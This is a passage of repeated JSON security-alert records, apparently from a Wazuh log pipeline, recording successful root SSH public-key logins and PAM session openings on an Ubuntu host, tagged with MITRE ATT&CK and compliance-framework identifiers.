Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session 